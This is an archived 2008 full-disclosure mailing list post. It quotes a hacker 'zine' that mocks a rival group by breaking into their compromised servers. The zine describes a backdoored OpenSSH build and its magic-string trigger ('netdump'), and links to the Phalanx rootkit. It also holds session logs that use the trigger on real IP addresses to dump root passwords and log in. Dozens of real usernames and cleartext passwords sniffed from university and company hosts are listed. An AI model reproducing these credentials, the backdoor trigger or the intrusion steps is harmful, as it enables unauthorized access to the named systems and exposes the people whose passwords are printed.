full-disclosure-uk August 2008 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] x0x0x? its a joke!

Re: [Full-disclosure] x0x0x? its a joke!

From: Robert Holgstad <rholgstad_at_nospam>
Date: Sun Aug 31 2008 - 18:14:09 GMT
To: "bussinessinbox box" <bussinessinbox@gmail.com>, full-disclosure@lists.grok.org.uk


you got owned by lamers, why do we care what you think or say?

also you complain that all they can do is use modified sshd versions and that this makes them lame, but during your 'zine' this is all you are doing. does this also make you 'lamer'?

On Sat, Aug 30, 2008 at 1:40 PM, bussinessinbox box < bussinessinbox@gmail.com> wrote:

> SOMEONE OWNED IN http://labsec.elite.vc/x0x0x-exposed.txt
>
>
>
> #!/labsec/v/for/vendetta:book1-x0x0x
> ######################################################################################################################
>
> # #
> # .____ ___. _________ #
>
> # | | _____ \_ |__ / _____/ ____ ____ #
> # | | \__ \ | __ \ \_____ \_/ __ \_/ ___\ #
>
> # | |___ / __ \| \_\ \/ \ ___/\ \___ #
> # |_______ (____ /___ /_______ /\___ >\___ > #
>
> # \/ \/ \/ \/ \/ \/ #
> # .___ .___ __ .__ #
>
> # | | ____ __| _/_ __ _______/ |________|__| ____ ______ #
> # | |/ \ / __ | | \/ ___/\ __\_ __ \ |/ __ \ / ___/ #
>
> # | | | \/ /_/ | | /\___ \ | | | | \/ \ ___/ \___ \ #
> # |___|___| /\____ |____//____ > |__| |__| |__|\___ >____ > #
>
> # \/ \/ \/ \/ \/ #
> # #
>
> # #
> # - presents: #
>
> # \- x0x0x exposed -/ #
> # #
>
> ######################################################################################################################
> # #
> # #
>
> # chapter one : random lame stuff #
> # chapter two : owned by yourself #
> # chapter three : download files/sniffs/stuff #
> # chapter four : conclusion #
>
> # - x0x0x - #
> # #
> # #
> # - [V]endetta. #
>
> # #
> #################################################################
>
>
> - <l> hello everyone !
> - <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)
>
> - <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
> - <l> now it's vendetta time !
>
>
> #################################################################
>
> # #
> # #
> # _ _ #
> # __| |_ __ _ _ __| |_ ___ _ _ ___ _ _ ___ #
>
> # / _| ' \/ _` | '_ \ _/ -_) '_| / _ \ ' \/ -_) #
> # \__|_||_\__,_| .__/\__\___|_| \___/_||_\___| #
> # |_| #
>
> # #
> # #
> #################################################################
>
>
> first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))
>
> [1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
> [2]; http://lasercomb.de/x0x0x2.txt
>
> have you noticed how lame they are ?
>
> all they can & will ever do is change your openssh version to a cracked one
> and pray that the users will log into some kool server
>
> and guess what, its NOT EVEN MADE by them ! - lets check it out -
>
> central@labsec [~xoxox/openssh-4.7p1] # more skynet.h
> /*
>
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
>
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
>
> #### #### ## #### ### ## ###### ####
>
> - V E R S I O N 1. 0 -
> coded by fmrj
> 11.01.2008
>
>
> Features:
> - Logs SSH, SCP, SFTP, SSHD and ip / hostname
> - ftp logger included (netkit-ftp)
> - Encrypted sniffer logs
> - SSH, SCP, SFTP will not log you
> - compile script (see compile.sh)
>
> - rootlogin is permitted even though remoterootlogin is set to no
> - Will not log to syslog, utmp, wtmp or lastlog
> - If MAGIC_VERSION is NOT undeclared:
> telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
>
> (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
> Also this will NOT get logged by syslog
>
>
> Future features:
> - pid hiding
> - More encryption / better sniffer encryption (thought of rc-crypt)
>
> - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
> - Have a cool PS1 for the bd
> - Write a ssh client that can:
> -> Connect and dump logs so you dont have to use telnet approach (encrypted)
>
> -> That can do connect-chain (ssh -bounce box1 box2 box3)
>
>
> If you have this, it either means we are friends or someone gave it to you, if so
> I would like this bd to be kept as private as possible, so please dont pass it on
>
> I would also appreciate suggestions / ideas / help / whatever for future features
> aim: fmrj09
>
>
> - Thanks *
>
> */
>
> - then there is some shit aion code which is public @ packetstorm -
> - their kool sshd backdoor kan be found in the end of thiz zine -
>
> - dont forget to check the gr8 shellscript skotch made -
>
> ################################## leTz hIghTlIghT 50m3th1n6 #############################
> telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
>
> ################################## LETS HIGHLIGHT SOMETHING #############################
>
> ohhhhhhwwwwwwww. k00l 3n0ugh !
> and gu355 wh47 ?
> th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !
>
>
> *thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks*
>
>
> central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
> #define MAGIC_VERSION "netdump"
>
>
> ----- th4nk5 8uddY ------
> ----- end of lame sshd backdor ----
>
> ***************** phalanx the gr8 kernel rootkit ***************
>
> 7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
> whAT ELsE Do thEY USE ?
>
> PHALANX ! THE gr8 prIv8 kERn3l r007k17
> get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2
>
> * attached their k00l phalanx in the bottom of the zine *
>
> ***************** phalanx the gr8 kernel rootkit ***************
>
> ------ funny stuff:
>
> while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..
>
> [139.82.95.11:22] : SSH-2.0-p2-FC-4.3
> [212.200.96.150:22] : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
> [216.75.56.186:22] : SSH-2.0-OenSSH_4.2
>
> [140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5
> [143.107.250.214:22] : SSH-1.99-p1
> [201.62.131.185:22] : SSH-2.0-p1 Debian-8ubuntu1.2
>
> [200.144.189.17:22] : SSH-1.99-p1
>
> you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
> answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners.
>
>
> [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
> they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ?
>
> they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all their boxes,
> which is the reason for the chapter two.
> [[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
>
> #################################################################
> # #
> # __ __ __ #
> # ____/ / ___ ____ / /____ ____ / /__ _____ #
>
> # / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \ #
> # \__/_//_/\_,_/ .__/\__/\__/_/ \__/|__,__/\___/ #
> # /_/ #
> # #
>
> # #
> #################################################################
>
> ; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
> ; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
>
> ; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
> ;
> ; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE
>
>
>
>
> central@labsec [~xoxox/h3h3] # telnet 189.3.219.4 22
>
> Trying 189.3.219.4...
> Connected to 189.3.219.4 (189.3.219.4).
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
>
> SSH2_OUT: 127.0.0.1 user: root pass: R4tD33Gl (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd
>
> - cut-
>
> ******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
> central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4
> root@189.3.219.4's password:
>
>
>
> Last login: Fri Aug 8 16:27:40 2008 from 189.4.161.222
>
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
> ### #### ## ##### ## ##
>
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux servnet 2.6.18-4-486 i686 ****
>
> root@servnet:~#
>
> root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
> Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
> inet addr:189.3.219.4 Bcast:189.3.219.63 Mask:255.255.255.192
>
> root@servnet:~# last -1 root
> root pts/2 189.4.161.222 Fri Aug 8 16:27 - 16:32 (00:04)
> 222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br.
>
>
> ******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 91.199.207.141 22
> Trying 91.199.207.141...
> Connected to 91.199.207.141.
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
>
> SSH2_OUT: 127.0.0.1 user: root pass: buCeTTT (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
>
> pass_from: 91.199.207.142 user: root pass: salinarsalinar (x2.sprintdns.net) -->>>>>>>>>> i hope you guys change the passwd real quick :)
>
> central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
> root@91.199.207.141's password:
>
> Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux x1 2.6.18-6-686 i686 ****
>
> root@x1:~#
> root@x1:~# uname -a;w;last -1 root
> Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
> 08:24:44 up 9 days, 14:48, 0 users, load average: 0.17, 0.11, 0.09
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
> root pts/0 97.139.broadband Sun Aug 10 12:17 - 12:38 (00:20)
> root@x1:~# ifconfig -a|grep inet
> inet addr:91.199.207.141 Bcast:91.199.207.255 Mask:255.255.255.0
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 195.91.248.58 22
>
> Trying 195.91.248.58...
> Connected to 195.91.248.58.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.7
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
>
> SSH2_OUT: 127.0.0.1 user: root pass: DiVRuu (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.
>
>
> central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
> root@195.91.248.58's password:
>
> Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux localhost 2.6.24-gentoo-r3 i686 ****
>
> localhost ~ #
> localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
> Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU E4500 @ 2.20GHz GenuineIntel GNU/Linux
>
> 10:30:35 up 1 day, 22:21, 0 users, load average: 0.15, 0.12, 0.09
> USER TTY LOGIN@ IDLE JCPU PCPU WHAT
> root pts/1 ppp85-140-31-214 Mon Aug 11 13:00 - 13:07 (00:06)
>
> wtmp begins Mon Mar 31 21:49:08 2008
>
> inet addr:195.91.248.58 Bcast:195.91.248.63 Mask:255.255.255.240
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 195.71.126.86 22
> Trying 195.71.126.86...
> Connected to 195.71.126.86.
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.2
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
> pam_from: 91.128.212.13 user: root pass: w22662s (d91-128-212-13.cust.tele2.at) ---->>>> no localhost this time(yay!) but it works.
>
> central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
> root@195.71.126.86's password:
>
> root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
>
> Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
> 08:34:52 up 42 days, 19:58, 3 users, load average: 0,91, 1,05, 1,07
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
>
> root pts/39 chello0841120232 Sat00 3days 0.93s 0.89s mc
> root pts/5 chello0841120232 Fri09 2days 0.01s 0.01s -bash
> root pts/7 chello0841120232 Fri23 2days 1:20 1:20 mc
> inet Adresse:195.71.126.86 Bcast:195.71.126.95 Maske:255.255.255.240
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 152.66.208.100 22
>
> Trying 152.66.208.100...
> Connected to 152.66.208.100.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
>
> SSH2_OUT: 127.0.0.1 user: joeb pass: xaoAs.. (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
>
> pass_from: 78.131.80.171 user: joeb pass: milegyen (78-131-80-171.pool.hdsnet.hu) > better be changing that by now.
>
> SSH2_OUT: 78.131.80.171 user: joeb pass: megistudom (78-131-80-171.pool.hdsnet.hu)> better be changing that by now.
>
> SSH2_OUT: 84.2.126.154 user: joeb pass: valami (dsl54027E9A.pool.t-online.hu) > better be changing that by now.
>
>
> central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
> root@152.66.208.100's password:
>
> Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux maszat 2.6.18-6-686-bigmem i686 ****
>
> root@maszat:~#
> root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
> 08:41:36 up 25 days, 16:08, 0 users, load average: 0.19, 0.15, 0.05
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:152.66.208.100 Bcast:152.66.208.127 Mask:255.255.255.128
>
> inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 147.46.242.9 22
> Trying 147.46.242.9...
> Connected to 147.46.242.9.
> Escape character is '^]'.
>
> SSH-2.0-OpenSSH_4.7
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
>
> SSH2_OUT: 127.0.0.1 user: root pass: NjKeyJ (localhost) --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
>
> pass_from: 147.46.242.52 user: dreameye pass: ii1945 (ropas.snu.ac.kr) ------>>>>>>>>>>>>>> sorry koreans, nothing personal.
>
> pass_from: 211.48.102.167 user: dk pass: 0ghafjs ------>>>>>>>>>>>>>> i mean, personal with you, you no.
>
>
> central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
> root@147.46.242.9's password:
>
> Last login: Thu Aug 7 03:35:51 2008 from ropas.snu.ac.kr
>
> **** Connected to ****
>
> ### # ### ## ### ## ### ### ###### ######
> ## # ## # ## ## ## # ## # # ## #
> #### ### #### ### # #### ##
>
> ### #### ## ##### ## ##
> # ## ## ## ## ## ## ## ## ##
> #### #### ## #### ### ## ###### #### 1.0
> **** Linux abs 2.6.24-19-server i686 ****
>
> root@abs:~#
> root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
> Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
> 15:49:37 up 8 days, 1:53, 0 users, load average: 0.00, 0.00, 0.00
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:147.46.242.9 Bcast:147.46.242.255 Mask:255.255.255.0
>
> inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
> inet addr:127.0.0.1 Mask:255.0.0.0
> inet6 addr: ::1/128 Scope:Host
> dreameye pts/0 ropas.snu.ac.kr Thu Aug 7 03:35 - 03:36 (00:00)
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022 ----- same applies for 200.160.119.93 (another dumbox on the network)
>
> Trying 200.160.119.92...
> Connected to 200.160.119.92.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user?
>
> pass_from: 192.168.100.231 user: root pass: m4c4c0z3e1 (tradestation231.eum.intranet)> hello m0nk3y
>
> central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92 -p 8022
> root@200.160.119.92's password:
>
> ******* no skynet thiz timE *********** h3h3h3h3 ***********
>
> Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
>
> root@eumisrvgw2:~#
> root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
> 03:18:45 up 24 days, 9:43, 0 users, load average: 0.01, 0.03, 0.00
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:192.168.100.242 Bcast:192.168.100.255 Mask:255.255.255.0
>
> inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
> inet addr:192.168.200.254 Bcast:192.168.200.255 Mask:255.255.255.0
>
> inet addr:200.160.119.92 Bcast:200.160.119.95 Mask:255.255.255.240
> inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
>
> inet addr:200.169.223.172 Bcast:200.169.223.175 Mask:255.255.255.248
>
> root@eumisrvgw2:~# last -10 root|grep 189\.4
>
> root pts/0 189.4.161.222 Mon Aug 11 14:24 - 14:44 (00:19) ----------------------->>>>> i wonder who that kool ip iz.
> ----------------------->>>>> bruteforce again? what a zhame !
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 200.20.9.67 22
>
> Trying 200.20.9.67...
> Connected to 200.20.9.67.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump
> SSH2_OUT: 127.0.0.1 user: root pass: vEcTrrA (localhost)
>
> central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67 -p 8022
> root@200.20.9.67's password:
>
> root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
>
> Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
> 04:38:02 up 54 days, 1:50, 17 users, load average: 0.05, 0.01, 0.00
> root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT ------------>> this is their default sniffer path.
>
> SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuX0527 (didi.if.uff.int)
> SSH2_OUT: 10.0.0.101 user: lourenco pass: LiNuXS0527 (didi.if.uff.int)
>
> SSH2_OUT: 10.0.0.101 user: nuno pass: surfar (catuaba.if.uff.int)
> SSH2_OUT: 10.0.0.106 user: lourenco pass: LiNuX0527 (cerbero4.if.uff.int)
>
> SSH2_OUT: 10.0.0.108 user: critter pass: 559832 (ronaldinho.if.uff.int)
> SSH2_OUT: 10.0.0.136 user: davidvaz pass: 2o3145 (barabasi.if.uff.int)
>
> SSH2_OUT: 10.0.0.145 user: lubian pass: 15862jLr (lip-serverI.if.uff.int)
> SSH2_OUT: 10.0.0.147 user: mcosta pass: 950205 (nano3.if.uff.int)
>
> SSH2_OUT: 10.0.0.155 user: asa pass: gabixande2 (nanodc01.if.uff.int)
> SSH2_OUT: 10.0.0.155 user: mcosta pass: 950205 (nanodc01.if.uff.int)
>
> SSH2_OUT: 10.0.0.156 user: thiagofts pass: 8vacagk (Owner-PC.if.uff.int)
> SSH2_OUT: 10.0.0.157 user: alanfr pass: ck37=2x (ltspsrvr.if.uff.int)
>
> SSH2_OUT: 10.0.0.157 user: curso pass: curso (ltspsrvr.if.uff.int)
> SSH2_OUT: 10.0.0.157 user: help pass: slacksucks! (ltspsrvr.if.uff.int)
>
> SSH2_OUT: 10.0.0.157 user: opeador pass: slacksucks! (ltspsrvr.if.uff.int)
> SSH2_OUT: 10.0.0.157 user: operador pass: slacksucks! (ltspsrvr.if.uff.int)
>
> SSH2_OUT: 10.0.0.179 user: orahcio pass: wulto12 (viagra.if.uff.int)
> SSH2_OUT: 10.0.0.188 user: nuno pass: surfar (catuaba.if.uff.int)
>
> SSH2_OUT: 10.0.0.195 user: asa pass: gabixande2 (nano2.if.uff.int)
> SSH2_OUT: 10.0.0.196 user: isidoro pass: VU4R9C (zico.if.uff.int)
>
> SSH2_OUT: 10.0.0.2 user: isidoro pass: VU4R9C
> SSH2_OUT: 10.0.0.208 user: davidvaz pass: 2o3145 (homer.if.uff.int)
>
> SSH2_OUT: 10.0.0.208 user: davidvaz pass: o3145 (homer.if.uff.int)
> SSH2_OUT: 10.0.0.208 user: tgmattos pass: CAMtgm&7 (homer.if.uff.int)
>
> SSH2_OUT: 10.0.0.215 user: asa pass: gabixande2 (cerbero7.if.uff.int)
> SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX0527 (cerbero7.if.uff.int)
>
> SSH2_OUT: 10.0.0.215 user: lourenco pass: LiNuX05427 (cerbero7.if.uff.int)
> SSH2_OUT: 10.0.0.217 user: dionizio pass: Zoedoulos (cerbero9.if.uff.int)
>
> SSH2_OUT: 10.0.0.217 user: lourenco pass: LiNuX0527 (cerbero9.if.uff.int)
> SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX0527 (romario.if.uff.int)
>
> SSH2_OUT: 10.0.0.222 user: lourenco pass: LiNuX527 (romario.if.uff.int)
> SSH2_OUT: 10.0.0.226 user: dionizio pass: Zoedoulos (cerbero10.if.uff.int)
>
> SSH2_OUT: 10.0.0.226 user: lourenco pass: LiNuX0527 (cerbero10.if.uff.int)
> SSH2_OUT: 10.0.0.226 user: lourenco pass: exit (cerbero10.if.uff.int)
>
> SSH2_OUT: 10.0.0.227 user: jssm pass: Jujaja (complex000.if.uff.int)
> SSH2_OUT: 10.0.0.227 user: nuno pass: surfar (complex000.if.uff.int)
>
> SSH2_OUT: 10.0.0.227 user: pmco pass: druida99 (complex000.if.uff.int)
> SSH2_OUT: 10.0.0.231 user: alan pass: ck37=2x
>
> SSH2_OUT: 10.0.0.231 user: root pass: slacksucks!
> SSH2_OUT: 10.0.0.231 user: root pass: slacksucks! (urania.if.uff.int)
>
> SSH2_OUT: 10.0.0.246 user: bernardo pass: (damasco.if.uff.int)
> SSH2_OUT: 10.0.0.246 user: bernardo pass: truthno1 (damasco.if.uff.int)
>
> SSH2_OUT: 10.0.0.247 user: jssm pass: Jujaja (gould.if.uff.int)
> SSH2_OUT: 10.0.0.44 user: tgmattos pass: CAMtgm&7
>
> SSH2_OUT: 10.0.0.60 user: fsilveira pass: Instituto
> SSH2_OUT: 10.0.0.60 user: fsilveira pass: VaiPasSar
> SSH2_OUT: 10.0.0.75 user: davidvaz pass: 2o3145 (DOAS-Laptop.if.uff.int)
>
> SSH2_OUT: 10.0.0.78 user: alan pass: ck37=2x (urania.if.uff.int)
> SSH2_OUT: 10.0.0.93 user: pmco pass: druida99 (urubu.if.uff.int)
>
> SSH2_OUT: 10.0.0.93 user: pmco pass: druidruida99 (urubu.if.uff.int)
> SSH2_OUT: 10.0.0.97 user: critter pass: 559832 (ronaldinho.if.uff.int)
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 203.161.120.230 22
>
> Trying 203.161.120.230...
> Connected to 203.161.120.230.
> Escape character is '^]'.
> SSH-2.0-OpenSSH_4.3
> netdump --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
>
> pass_from: 58.7.216.153 user: root pass: @pixar87 (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry pal.
>
>
> central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
> root@203.161.120.230's password:
>
> ----- no skynet -------
>
> Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au
>
> zeus:~#
> zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
> Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
> 15:27:04 up 104 days, 6:19, 1 user, load average: 0.00, 0.02, 0.00
>
> USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
> inet addr:203.161.120.230 Bcast:203.161.120.255 Mask:255.255.255.240
>
> inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
> inet addr:11.11.11.3 Bcast:11.255.255.255 Mask:255.255.255.0
>
> zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more
> SSH2_OUT: 11.11.11.55 user: michael pass: @pixar87
> SSH2_OUT: 11.11.11.55 user: michael pass: dh0st1ngd
>
> SSH2_OUT: 11.11.11.55 user: michael pass: ruup2it
> SSH2_OUT: 11.11.11.55 user: root pass: @pixar87
> SSH2_OUT: 11.11.11.9 user: admin pass: @pixar87
>
> SSH2_OUT: 11.11.11.9 user: admin pass: emaildivers
> SSH2_OUT: 11.11.11.9 user: admin pass: jugg3r0
> SSH2_OUT: 11.11.11.9 user: root pass: @pixar887
>
> SSH2_OUT: 11.11.11.9 user: root pass: jugg3r0
> pass_from: 10.10.10.129 user: root pass: @pixar87
>
> -/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-
>
> central@labsec [~xoxox/h3h3] # telnet 207.145.66.12 22
